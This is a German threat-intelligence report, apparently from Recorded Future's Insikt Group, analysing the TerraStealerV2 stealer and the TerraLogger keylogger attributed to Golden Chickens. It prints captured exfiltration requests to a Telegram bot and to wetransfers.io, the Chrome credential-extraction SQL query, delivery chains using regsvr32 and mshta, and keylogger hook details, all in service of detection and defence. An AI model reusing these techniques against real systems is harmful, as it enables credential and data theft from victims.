TerraStealerV2 und TerraLogger: Neue Malware-Familien von Golden Chickens entdeckt

Executive Summary

Die Insikt Group identifizierte zwei neue Malware-Familien – TerraStealerV2 und TerraLogger –, die mit dem finanziell motivierten Bedrohungsakteur Golden Chickens (auch bekannt als Venom Spider) in Verbindung stehen. Golden Chickens ist bekannt dafür, eine Malware-as-a-Service (MaaS)-Plattform zu betreiben, die von Cyberkriminellengruppen wie FIN 6, Cobalt Group und Evilnum genutzt wird. Die neuen Familien, die zwischen Januar und April 2025 beobachtet wurden, deuten auf eine kontinuierliche Entwicklung hin, die auf den Diebstahl von Zugangsdaten und das Keylogging abzielt.

TerraStealerV2 wurde entwickelt, um Browser-Anmeldeinformationen, Daten von Kryptowährungs-Wallets und Informationen zu Browser-Erweiterungen zu sammeln. Während es auf die „Login Data“-Datenbank von Chrome abzielt, um Anmeldeinformationen zu stehlen, umgeht es nicht den Schutz der Application Bound Encryption (ABE), der in Chrome-Updates nach Juli 2024 eingeführt wurde, was darauf hindeutet, dass der Malware-Code veraltet ist oder sich noch in der Entwicklung befindet. Daten werden sowohl zu Telegram als auch zur Domain wetransfers[.]io exfiltriert. Es wurde beobachtet, dass der Stealer über mehrere Formate verbreitet wird, darunter LNK-, MSI-, DLL- und EXE-Dateien, und er nutzt vertrauenswürdige Windows-Dienstprogramme wie regsvr32.exe und mshta.exe, um verdeckt zu bleiben.

TerraLogger hingegen ist ein eigenständiger Keylogger. Er verwendet einen allgemeinen Low-Level-Tastatur-Hook, um Tastenanschläge aufzuzeichnen und schreibt die Protokolle in lokale Dateien. Er enthält jedoch keine Funktionen für die Datenexfiltration oder Command-and-Control (C2)-Kommunikation, was darauf hindeutet, dass es sich entweder in einer frühen Entwicklungsphase befindet oder als modularer Bestandteil des MaaS-Ökosystems von Golden Chickens konzeptioniert wurde.

Der aktuelle Status von TerraStealerV2 und TerraLogger lässt darauf schließen, dass sich beide Tools noch in der aktiven Entwicklung befinden und noch nicht das Maß an Tarnung aufweisen, das typischerweise mit ausgereiften Tools von Golden Chickens verbunden wird. Angesichts der Geschichte von Golden Chickens bei der Entwicklung von Malware für den Diebstahl von Anmeldeinformationen und Zugriffsoperationen werden sich diese Fähigkeiten wahrscheinlich weiterentwickeln. Organisationen wird empfohlen, die im Bericht enthaltenen Leitlinien zur Schadensbegrenzung zu befolgen, um das Risiko einer Kompromittierung zu verringern, während diese Malware-Familien ausgereift werden.

Wichtige Erkenntnisse

• Die Insikt Group identifizierte zwei neue Malware-Familien, TerraStealerV2 und TerraLogger, die dem Bedrohungsakteur Golden Chickens zugeschrieben werden. TerraStealerV2 kann Browser-Anmeldeinformationen stehlen und auf Kryptowährungs-Wallets abzielen, während TerraLogger ausschließlich als eigenständiges Keylogger-Modul fungiert.
• TerraLogger ist der erste beobachtete Einsatz einer Keylogging-Funktion in einer von Golden Chickens entwickelten Malware.
• TerraStealerV2 unterstützt nicht die Entschlüsselung von Chrome ABE-geschützten Anmeldeinformationen, was darauf hindeutet, dass das Tool wahrscheinlich veraltet ist oder sich noch in der Entwicklung befindet.
• Die Insikt Group beobachtete zwischen Januar und März 2025 zehn verschiedene TerraStealerV2-Verteilungsproben, die unterschiedliche Bereitstellungsmethoden verwendeten, darunter MSI-, DLL- und LNK-Dateien.

Hintergrund

Golden Chickens, auch unter dem Alias Venom Spider bekannt, ist ein finanziell motivierter Cyber-Bedrohungsakteur, der für den Betrieb einer unauffälligen und modularen Malware-Suite unter einem MaaS-Modell bekannt ist. Seit mindestens 2018 wird die Golden Chickens MaaS-Suite in Kampagnen eingesetzt, die auf hochwertige Organisationen über Social-Engineering-Vektoren abzielen, insbesondere Spearphishing-Kampagnen, die gefälschte Stellenangebote oder Lebensläufe nutzen. Bemerkenswerterweise wird die Malware von erstklassigen Cyberkriminalitätsgruppen verwendet, darunter die in Russland ansässigen FIN6 und Cobalt Group sowie die in Belarus ansässige Evilnum, die mit Schäden von über 1,5 Milliarden USD weltweit in Verbindung gebracht wurde.

Die Kernkomponenten der Golden Chickens MaaS-Suite sind VenomLNK und TerraLoader. Die Erstinfektionen werden typischerweise durch VenomLNK, eine bösartige Windows-Verknüpfungsdatei, erreicht, die TerraLoader ausführt, ein Lademodul, das für die Bereitstellung zusätzlicher Golden Chickens-Malware verantwortlich ist. Diese Module umfassen TerraStealer für das Sammeln von Anmeldeinformationen, TerraTV für die Übernahme von TeamViewer und TerraCrypt für die Bereitstellung von Ransomware. Zusätzliche Malware-Familien, die dem Golden Chickens-Ökosystem zugeschrieben werden, umfassen TerraRecon für Aufklärungszwecke, TerraWiper zum Datenlöschen und lite_more_eggs, wie in Abbildung 1 unten dargestellt.

Abbildung 1: Zuvor gemeldete Golden Chickens-Malware-Familien (Quelle: Quo Intelligence)

Die Attribution-Bemühungen der Threat Response Unit von eSentire haben Golden Chickens mit einem Bedrohungsakteur namens badbullzvenom in Verbindung gebracht, einer Persona, von der angenommen wird, dass sie gemeinsam von Personen aus Moldawien und Montreal, Kanada, betrieben wird. Die Entwicklungsgeschichte des Bedrohungsakteurs zeigt den Fortschritt von einem unbedeutenden Forumsteilnehmer zu einem etablierten MaaS-Anbieter. Die von Golden Chickens entwickelten Tools wurden in mehreren Kampagnen als Waffe eingesetzt, darunter aufsehenerregende Angriffe auf British Airways, Newegg und Ticketmaster UK.

Zwischen August und Oktober 2024 beobachtete Zscaler ThreatLabz erneute Aktivitäten, die Golden Chickens zugeschrieben wurden, bei denen zwei neu identifizierte Malware-Familien eingesetzt wurden: RevC2 und Venom Loader. Diese Tools wurden über VenomLNK-Kampagnen bereitgestellt, wobei Social-Engineering-Köder wie Zahlungsanfragen in Kryptowährung und Software-API-Dokumentation genutzt wurden. Abbildung 2 veranschaulicht die Angriffskette, die zur Bereitstellung von RevC2 verwendet wurde.

Abbildung 2: Jüngste Angriffskette von Golden Chickens zur Bereitstellung von RevC2 (Quelle: ZScaler)

Während der anfängliche Übertragungsvektor nicht bekannt ist, beginnt die Infektionssequenz mit der Ausführung einer VenomLNK-Datei. Diese Datei lädt ein Täuschungsbild herunter, das mit dem Köderthema (in diesem Fall Software-API-Dokumentation) übereinstimmt, und leitet die Ausführung von RevC2 ein. Insbesondere nutzt die LNK-Datei wmic.exe, um regsvr32.exe aufzurufen, die eine schädliche OCX-Nutzlast lädt, die auf einem entfernten Netzwerkfreigabe gehostet wird.

Technische Analyse

Die Insikt Group hat zwei neue Malware-Familien identifiziert, die der Bedrohungsakteursgruppe Golden Chickens zugeschrieben werden. Der erste, als TerraStealerV2 verfolgte, ist ein Stealer, der hauptsächlich auf Browser-Anmeldedaten, Kryptowährungs-Wallets und Browser-Erweiterungen abzielt. Der zweite, als TerraLogger verfolgte, ist ein Keylogger, der als eigenständiges Modul beobachtet wird. Die folgenden Unterabschnitte bieten eine detaillierte technische Analyse jeder Malware-Familie.

TerraStealerV2

Die Insikt Group hat kürzlich einen neuen Stealer identifiziert, der Golden Chickens zugeschrieben wird und am 3. März 2025 auf Recorded Future Malware Intelligence hochgeladen wurde. Ein in das Beispiel eingebetteter Programmdatenbankpfad (PDB) (siehe Abbildung 3) deutet darauf hin, dass der Bedrohungsakteur die Malware als NOK bezeichnet; die Insikt Group verfolgt sie jedoch als TerraStealerV2.

Der Stealer soll als OCX-Datei bereitgestellt und über das Programm regsvr32.exe ausgeführt werden, das die Exportfunktion von DllRegisterServer aufruft. Bei der Ausführung überprüft DllRegisterServer zunächst, ob die bereitgestellte Datei die Endung .ocx hat und dass der Dateiname mit einem bestimmten, fest codierten Zeichen oder einer Ziffer endet (z. B. 0.ocx). Dann wird überprüft, ob die Datei von regsvr32.exe ausgeführt wird, bevor fortgefahren wird, wie in Abbildung 4 unten gezeigt.

Abbildung 4: Flussdiagramm, das die Anti-Analyse-Prüfungen von TerraStealerV2 veranschaulicht (Quelle: Recorded Future)

Die Malware führt anschließend eine String-Deobfuskation mithilfe einer XOR-Decodierungsroutine mit einem fest codierten Schlüssel durch. Sie sammelt grundlegende Hostinformationen, indem GetUserNameA und GetComputerNameA aufgerufen werden, um die lokalen Benutzer- und Systemnamen abzurufen. Es ermittelt dann die IP-Adresse des Opfers, indem es eine HTTP-Anfrage an ifconfig[.]me stellt. Die gesammelten Daten werden anschließend über die Telegram-Nachrichtenplattform an einen Kanal namens „Noterdam“ unter Verwendung eines Bot-Tokens, das mit „NoterdanssBot“ verknüpft ist, exfiltriert, wie in Abbildung 5 dargestellt.

POST /< redacted >/sendMessage?chat_id=-4652754121 HTTP/1.1
Host: api.telegram.org
Accept: */*
Content-Length: 24014
Content-Type: application/x-www-form-urlencoded

chat_id=-4652754121&text=%2A%2ANew%20User%20Ran%20the%20Application%2A%2A%0A%2A%2AUsername%3A%2A%2A%20Admin%0A%2A%2APC%20Name%3A%2A%2A%20UUHJKMQK%0A%2A%2AIP%20Address%3A%2A%2A%20%3C%21DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-style-type%22%20content%3D%22text%2Fcss%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-script-type%22%20content%3D%22text%2Fjavascript%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22content-language%22%20content%3D%22en%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22pragma%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22cache-control%22%20content%3D%22no-cache%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22description%22%20content%3D%22Get%20my%20IP%20Address%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22keywords%22%20content%3D%22ip%20address%20ifconfig%20ifconfig.me%22%20%2F%3E%0A%20%20%20%20%3Cmeta%20name%3D%22author%22%20content%3D%22%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22favicon.ico%22%20%2F%3E%0A%20%20%20%20%3Clink%20rel%3D%22canonical%22%20href%3D%22https%3A%2F%2Fifconfig.me%2F%22%20%2F%3E%0A%20%20%20%20%3Ctitle%3EWhat%20Is%20My%20IP%20Address%3F%20-%20ifconfig.me%3C%2Ftitle%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20href%3D%22.%2Fstatic%2Fstyles%2Fstyle.css%22%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%3E%0A%20%20%20%20%3Clink%20href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffa
      

Die URL-Dekodierung der POST-Daten der Nachricht zeigt, dass der Bedrohungsakteur eine strukturierte Benachrichtigung an einen Telegram-Kanal sendet. Die Benachrichtigung, die in Abbildung 6 dargestellt ist, enthält eine Warnung, die darauf hinweist, dass ein neuer Benutzer die Anwendung ausgeführt hat, den erfassten Benutzernamen und Systemnamen sowie die unformatierte HTML-Antwort der ifconfig[.]me-Abfrage.

**New User Ran the Application**
**Username:** Admin
**PC Name:** UUHJKMQK
**IP Address:** <!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="content-style-type" content="text/css" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <meta http-equiv="content-language" content="en" />
    <meta http-equiv="pragma" content="no-cache" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta name="description" content="Get my IP Address" />
      

Die Malware enumeriert anschließend aktive Prozesse und sucht nach Instanzen von chrome.exe; Wenn es erkannt wird, versucht es, den Prozess mithilfe der TerminateProcess-Windows-API zu beenden. Dieses Verhalten soll wahrscheinlich alle Dateisperren auf den Datenbankdateien des Chrome-Browsers aufheben, um einen ungehinderten Zugriff während der Datenextraktion zu gewährleisten. Im Anschluss daran versucht die Malware, gespeicherte Anmeldeinformationen und andere sensible Daten aus Chrome zu extrahieren und zielt auf bestimmte Kryptowährungs-Wallets und Browsererweiterungen ab.

Die Implementierung des Datenbankdiebstahls im Chrome-Browser kopiert die Datenbank „Login Data“ nach C:ProgramData\Temp\LoginData und extrahiert dann die gespeicherten Logins mithilfe einer statisch verlinkten SQLite-Bibliothek, um die SQL-Abfrage SELECT origin_url, username_value, password_value FROM logins auszuführen. TerraStealerV2 verwendet SQLite Version 3.46.0. Dies ist dieselbe Version, die in RevC2 statisch verlinkt ist, was auf eine mögliche Wiederverwendung von Code oder gemeinsame Entwicklungspraktiken hindeutet. Die Implementierung umgeht jedoch nicht die ABE von Chrome, was bedeutet, dass gesammelte Passwörter für Hosts mit Chrome-basierten Browsern, die seit dem 24. Juli 2024 aktualisiert wurden, nicht entschlüsselt werden können. Diese Einschränkung deutet darauf hin, dass der Stealer-Code veraltet ist oder sich noch in der aktiven Entwicklung befindet, da effektive Stealer typischerweise ABE-Bypass-Techniken verwenden, um entschlüsselte Anmeldeinformationen aus modernen Versionen von Chrome oder Microsoft Edge zu extrahieren.

Exfiltrierte Browser-Anmeldedaten und Informationsmeldungen werden nach Abschluss der Diebstahlvorgänge in C:\ProgramData\file.txt geschrieben und in %LOCALAPPDATA%\Packages\Bay0NsQIzx\p.txt kopiert. Wenn sie gefunden werden, werden die Verzeichnisse der anvisierten Browser-Erweiterungen und Wallets nach %LOCALAPPDATA%\Packages\Bay0NsQIzx kopiert, und es wird eine Telegram-Nachricht gesendet, die die Anzahl der gefundenen Krypto-Wallets angibt. Der Inhalt von %LOCALAPPDATA%\Packages\Bay0NsQIzx wird anschließend in ein Archiv mit dem Namen output.zip komprimiert, befindet sich im selben Verzeichnis. Das Archiv wird dann an den Telegram-Bot und einen sekundären C2-Endpunkt exfiltriert, der unter wetransfers[.]io/uplo.php gehostet wird, wie in Abbildung 7 gezeigt. Die Domain wetransfers[.]io wurde am 18. Februar 2025 über NameCheap, Inc. registriert und wird derzeit hinter der Cloudflare-Infrastruktur gehostet.

POST /uplo.php HTTP/1.1
Host: wetransfers.io
Accept: */*
Content-Length: 11252
Content-Type: multipart/form-data; boundary=------------------------rUxSmqCNbtGx4auL8M41nl

--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="zipFile"; filename="output.zip"
Content-Type: application/octet-stream

PK........3.dZ...')...).......p.txt2025-03-04 21:33:38 - Total Browsers  2
PK..?.......3.dZ...')...).....................p.txtPK..........3...L.....
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="pcname"

UUHJKMQK
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="username"

Admin
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="totalwallets"

0
--------------------------rUxSmqCNbtGx4auL8M41nl
Content-Disposition: form-data; name="ip"

<!DOCTYPE html>
<html lang="en">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta http-equiv="content-style-type" content="text/css" />
   <meta http-equiv="content-script-type" content="text/javascript" />
   <meta http-equiv="content-language" content="en" />
   <meta http-equiv="pragma" content="no-cache" />
   <meta http-equiv="cache-control" content="no-cache" />
   <meta name="description" content="Get my IP Address" />
   <meta name="keywords" content="ip address ifconfig ifconfig.me" />

Verbreitung

Die Insikt Group hat mehrere Bereitstellungsmechanismen identifiziert, die bei der Verteilung von TerraStealerV2 eingesetzt werden, darunter ausführbare Dateien (EXEs), dynamische Link-Bibliotheken (DLLs), Windows Installer-Pakete (MSI) und Verknüpfungsdateien (LNK). In allen beobachteten Fällen wurde die TerraStealerV2 OCX-Nutzlast von der URL wetransfers[.]io/v.php abgerufen – eine Ressource, die auf derselben Domäne gehostet wird und für die Datenexfiltration genutzt wird –, entweder mit curl oder PowerShell, und anschließend über regsvr32.exe ausgeführt (siehe Abbildung 8).

Abbildung 8: Verteilungsproben-Angriffskette von TerraStealerV2 (Quelle: Recorded Future)

Tabelle 1 listet Verteilungsbeispiele auf, einschließlich ihrer Dateinamen, Kompilierung-Zeitstempel und der entsprechenden TerraStealerV2-Nutzlasten, die von Golden Chickens beobachtet wurden. Eine LNK-Datei (SHA-256: 9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a) scheint sich mit dem Aktivitätscluster zu überschneiden, der als ClickFix verfolgt wird. In diesem Fall hat die LNK-Datei eine Nutzlast abgelegt, die sich als MP4-Datei tarnte und über mshta.exe ausgeführt wurde – eine Technik, die mit zuvor beobachteten Taktiken aus ClickFix-Kampagnen übereinstimmt.

Tabelle 1: Proben, die zur Verbreitung von TerraStealerV2 verwendet wurden (Quelle: Recorded Future)

TerraLogger

Die Insikt Group identifizierte einen neuen Keylogger im Zusammenhang mit Golden Chickens, der am 13. Januar 2025 auf Recorded Future Malware Intelligence hochgeladen wurde. Die Insikt Group verfolgt diese Familie als TerraLogger und hat fünf verschiedene Proben identifiziert. Vier Proben funktionieren wie vorgesehen und enthalten eine identische PDB-Zeichenfolge, die in Abbildung 9 unten gezeigt wird. Die verbleibende Probe enthält diese PDB-Zeichenfolge nicht und verwendet stattdessen denselben PDB-Pfad wie TerraStealerV2 (siehe Abbildung 3 oben). Dieser Ausreißer scheint ein Entwicklertest zu sein, der dieselbe Zeichenfolgen-Codierungsmethode wie TerraStealerV2 verwendet; jedoch schlägt die Ausführung aufgrund eines Absturzes beim Initialisieren von keylogger-bezogenen Zeichenfolgen fehl, was verhindert, dass die Malware ihren primären Einstiegspunkt erreicht.

C:\Users\PC\Downloads\Projector\Projector\x64\Release\Projector.pdb

TerraLogger wird typischerweise als OCX-Datei bereitgestellt und führt dieselben anfänglichen Ausführungsprüfungen wie TerraStealerV2 durch. Es ist vorgesehen, dass es über regsvr32.exe ausgeführt wird, welches die Exportfunktion von DllRegisterServer aufruft. Bei der Ausführung wird zunächst überprüft, ob die bereitgestellte Datei die Endung „.ocx“ besitzt. Erweiterung und dass der Dateiname mit einem fest codierten Zeichen oder einer Ziffer endet (z. B. 0.ocx). Es überprüft dann, ob es von regsvr32.exe ausgeführt wird, bevor es fortfährt. Wenn die anfänglichen Ausführungsprüfungen erfolgreich sind, öffnet TerraLogger einen Datei-Handle, um Tastenanschläge zu protokollieren.

Die Insikt Group identifizierte mehrere Dateipfade in den fünf identifizierten Proben, wobei Protokolle in Dateien wie a.txt, f.txt, op.txt oder save.txt geschrieben wurden, die sich im Ordner C:\ProgramData befinden. Die Malware implementiert ihren Keylogger mit einer häufig beobachteten Technik, indem sie einen WH_KEYBOARD_LL-Hook mit SetWindowsHookExA installiert und die fn-Callback-Funktion (siehe Abbildung 10) registriert, um Nachrichtenereignisse abzufangen und zu verarbeiten, wodurch die Tastaturaktivität erfasst werden kann.

Abbildung 10: Keylogger-Rückruffunktion (Quelle: Recorded Future)

Tastenanschläge werden in die geöffnete Protokolldatei innerhalb der Funktion mw_log_key geschrieben. Diese Funktion ruft zunächst den Titel des aktuellen Vordergrundfensters ab und fügt dann ein Zeilentrennzeichen hinzu, gefolgt von den abgefangenen Tastenanschlägen. Es enthält eine Logik zur Behandlung von Sonderzeichen, wie Semikolons, Klammern und Anführungszeichen, und überprüft den Zustand der Umschalttaste, um das richtige Zeichen für die Protokollierung zu ermitteln. Wenn ein Keycode mit keinem bekannten Sonderzeichen übereinstimmt, wird er im Format <KEY-[keycode]> geschrieben. Ein Beispiel einer resultierenden Protokolldatei wird in Abbildung 11 gezeigt.

Abbildung 11: Beispiel einer Keylogger-Protokolldatei (Quelle: Recorded Future)

Tabelle 2 listet die fünf identifizierten TerraLogger-Keylogger-Proben auf und fasst die Unterschiede zwischen den Versionen zusammen. Kompilierungszeitstempel zeigen an, dass die erste Version am 13. Januar 2025 erstellt wurde und dass das neueste Beispiel am 1. April 2025 kompiliert wurde. Diese Beispiele spiegeln kleinere, inkrementelle Aktualisierungen wider, die auf eine aktive Entwicklung hindeuten. Nennenswerte Änderungen umfassen Modifikationen des Dateipfads zur Speicherung von Tastenanschlagsprotokollen und eine Umstellung in der Darstellung von Sondertasten – von in spitzen Klammern gesetzten, großgeschriebenen Tokens (zum Beispiel , ) zu durch Pipes getrennten, kleingeschriebenen Abkürzungen (zum Beispiel |bck|, |sft|).